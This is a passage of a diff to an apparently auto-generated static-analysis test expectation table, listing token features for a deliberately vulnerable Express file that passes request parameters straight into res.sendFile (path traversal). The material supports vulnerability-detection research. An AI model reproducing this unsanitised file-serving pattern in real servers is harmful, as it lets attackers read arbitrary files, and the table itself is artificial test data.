data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:18:37:18:58 | root: r ... ("dir") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:18:37:18:58 | root: r ... ("dir") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:18:37:18:58 | root: r ... ("dir") | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:18:37:18:58 | root: r ... ("dir") | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:18:43:18:45 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:18:43:18:45 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:18:43:18:45 | req | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:18:43:18:45 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:18:43:18:45 | req | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:18:43:18:51 | req.param | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:18:43:18:51 | req.param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:18:43:18:51 | req.param | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:18:43:18:51 | req.param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:18:43:18:51 | req.param | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:18:43:18:58 | exceptional return of req.param("dir") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:18:43:18:58 | exceptional return of req.param("dir") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:18:43:18:58 | exceptional return of req.param("dir") | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:18:43:18:58 | exceptional return of req.param("dir") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:18:43:18:58 | exceptional return of req.param("dir") | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:18:43:18:58 | req.param("dir") | CalleeFlexibleAccessPath | res.sendFile | | autogenerated/TaintedPath/tainted-sendFile.js:18:43:18:58 | req.param("dir") | InputAccessPathFromCallee | 1.root | | autogenerated/TaintedPath/tainted-sendFile.js:18:43:18:58 | req.param("dir") | InputArgumentIndex | 1 | @@ -11068,6 +86195,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:18:43:18:58 | req.param("dir") | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | | autogenerated/TaintedPath/tainted-sendFile.js:18:43:18:58 | req.param("dir") | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:18:43:18:58 | req.param("dir") | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:18:47:18:51 | param | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:18:47:18:51 | param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:18:47:18:51 | param | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:18:47:18:51 | param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:18:47:18:51 | param | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:18:53:18:57 | "dir" | CalleeFlexibleAccessPath | req.param | | autogenerated/TaintedPath/tainted-sendFile.js:18:53:18:57 | "dir" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-sendFile.js:18:53:18:57 | "dir" | contextFunctionInterfaces | | @@ -11076,6 +86208,46 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:18:53:18:57 | "dir" | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:18:53:18:57 | "dir" | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:18:53:18:57 | "dir" | receiverName | req | +| autogenerated/TaintedPath/tainted-sendFile.js:20:7:20:13 | homeDir | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:20:7:20:13 | homeDir | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:20:7:20:13 | homeDir | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:20:7:20:13 | homeDir | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:20:7:20:13 | homeDir | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:20:7:20:33 | homeDir | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:20:7:20:33 | homeDir | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:20:7:20:33 | homeDir | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:20:7:20:33 | homeDir | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:20:7:20:33 | homeDir | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:20:7:20:33 | homeDir ... ve('.') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:20:7:20:33 | homeDir ... ve('.') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:20:7:20:33 | homeDir ... ve('.') | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:20:7:20:33 | homeDir ... ve('.') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:20:7:20:33 | homeDir ... ve('.') | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:20:17:20:20 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:20:17:20:20 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:20:17:20:20 | path | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:20:17:20:20 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:20:17:20:20 | path | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:20:17:20:28 | path.resolve | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:20:17:20:28 | path.resolve | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:20:17:20:28 | path.resolve | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:20:17:20:28 | path.resolve | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:20:17:20:28 | path.resolve | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:20:17:20:33 | exceptional return of path.resolve('.') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:20:17:20:33 | exceptional return of path.resolve('.') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:20:17:20:33 | exceptional return of path.resolve('.') | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:20:17:20:33 | exceptional return of path.resolve('.') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:20:17:20:33 | exceptional return of path.resolve('.') | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:20:17:20:33 | path.resolve('.') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:20:17:20:33 | path.resolve('.') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:20:17:20:33 | path.resolve('.') | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:20:17:20:33 | path.resolve('.') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:20:17:20:33 | path.resolve('.') | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:20:22:20:28 | resolve | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:20:22:20:28 | resolve | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:20:22:20:28 | resolve | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:20:22:20:28 | resolve | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:20:22:20:28 | resolve | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:20:30:20:32 | '.' | CalleeFlexibleAccessPath | path.resolve | | autogenerated/TaintedPath/tainted-sendFile.js:20:30:20:32 | '.' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-sendFile.js:20:30:20:32 | '.' | calleeImports | path | @@ -11085,6 +86257,42 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:20:30:20:32 | '.' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:20:30:20:32 | '.' | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:20:30:20:32 | '.' | receiverName | path | +| autogenerated/TaintedPath/tainted-sendFile.js:21:3:21:5 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:21:3:21:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:21:3:21:5 | res | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:21:3:21:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:21:3:21:5 | res | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:21:3:21:14 | res.sendFile | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:21:3:21:14 | res.sendFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:21:3:21:14 | res.sendFile | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:21:3:21:14 | res.sendFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:21:3:21:14 | res.sendFile | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:21:3:21:49 | exceptional return of res.sen ... rams.x) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:21:3:21:49 | exceptional return of res.sen ... rams.x) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:21:3:21:49 | exceptional return of res.sen ... rams.x) | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:21:3:21:49 | exceptional return of res.sen ... rams.x) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:21:3:21:49 | exceptional return of res.sen ... rams.x) | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:21:3:21:49 | res.sen ... rams.x) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:21:3:21:49 | res.sen ... rams.x) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:21:3:21:49 | res.sen ... rams.x) | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:21:3:21:49 | res.sen ... rams.x) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:21:3:21:49 | res.sen ... rams.x) | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:21:7:21:14 | sendFile | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:21:7:21:14 | sendFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:21:7:21:14 | sendFile | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:21:7:21:14 | sendFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:21:7:21:14 | sendFile | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:21:16:21:22 | homeDir | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:21:16:21:22 | homeDir | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:21:16:21:22 | homeDir | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:21:16:21:22 | homeDir | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:21:16:21:22 | homeDir | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:21:16:21:22 | homeDir | stringConcatenatedWith | -endpoint- '/data/' + req.params.x | +| autogenerated/TaintedPath/tainted-sendFile.js:21:16:21:33 | homeDir + '/data/' | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:21:16:21:33 | homeDir + '/data/' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:21:16:21:33 | homeDir + '/data/' | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:21:16:21:33 | homeDir + '/data/' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:21:16:21:33 | homeDir + '/data/' | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:21:16:21:48 | homeDir ... arams.x | CalleeFlexibleAccessPath | res.sendFile | | autogenerated/TaintedPath/tainted-sendFile.js:21:16:21:48 | homeDir ... arams.x | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-sendFile.js:21:16:21:48 | homeDir ... arams.x | contextFunctionInterfaces | | @@ -11093,6 +86301,69 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:21:16:21:48 | homeDir ... arams.x | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:21:16:21:48 | homeDir ... arams.x | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:21:16:21:48 | homeDir ... arams.x | receiverName | res | +| autogenerated/TaintedPath/tainted-sendFile.js:21:26:21:33 | '/data/' | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:21:26:21:33 | '/data/' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:21:26:21:33 | '/data/' | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:21:26:21:33 | '/data/' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:21:26:21:33 | '/data/' | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:21:26:21:33 | '/data/' | stringConcatenatedWith | homeDir -endpoint- req.params.x | +| autogenerated/TaintedPath/tainted-sendFile.js:21:37:21:39 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:21:37:21:39 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:21:37:21:39 | req | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:21:37:21:39 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:21:37:21:39 | req | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:21:37:21:46 | req.params | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:21:37:21:46 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:21:37:21:46 | req.params | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:21:37:21:46 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:21:37:21:46 | req.params | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:21:37:21:48 | req.params.x | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:21:37:21:48 | req.params.x | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:21:37:21:48 | req.params.x | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:21:37:21:48 | req.params.x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:21:37:21:48 | req.params.x | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:21:37:21:48 | req.params.x | stringConcatenatedWith | homeDir + '/data/' -endpoint- | +| autogenerated/TaintedPath/tainted-sendFile.js:21:41:21:46 | params | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:21:41:21:46 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:21:41:21:46 | params | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:21:41:21:46 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:21:41:21:46 | params | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:21:48:21:48 | x | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:21:48:21:48 | x | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:21:48:21:48 | x | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:21:48:21:48 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:21:48:21:48 | x | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:22:3:22:5 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:22:3:22:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:22:3:22:5 | res | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:22:3:22:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:22:3:22:5 | res | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:22:3:22:14 | res.sendfile | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:22:3:22:14 | res.sendfile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:22:3:22:14 | res.sendfile | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:22:3:22:14 | res.sendfile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:22:3:22:14 | res.sendfile | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:22:3:22:38 | exceptional return of res.sen ... rams.x) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:22:3:22:38 | exceptional return of res.sen ... rams.x) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:22:3:22:38 | exceptional return of res.sen ... rams.x) | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:22:3:22:38 | exceptional return of res.sen ... rams.x) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:22:3:22:38 | exceptional return of res.sen ... rams.x) | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:22:3:22:38 | res.sen ... rams.x) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:22:3:22:38 | res.sen ... rams.x) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:22:3:22:38 | res.sen ... rams.x) | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:22:3:22:38 | res.sen ... rams.x) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:22:3:22:38 | res.sen ... rams.x) | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:22:7:22:14 | sendfile | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:22:7:22:14 | sendfile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:22:7:22:14 | sendfile | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:22:7:22:14 | sendfile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:22:7:22:14 | sendfile | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:22:16:22:22 | 'data/' | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:22:16:22:22 | 'data/' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:22:16:22:22 | 'data/' | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res 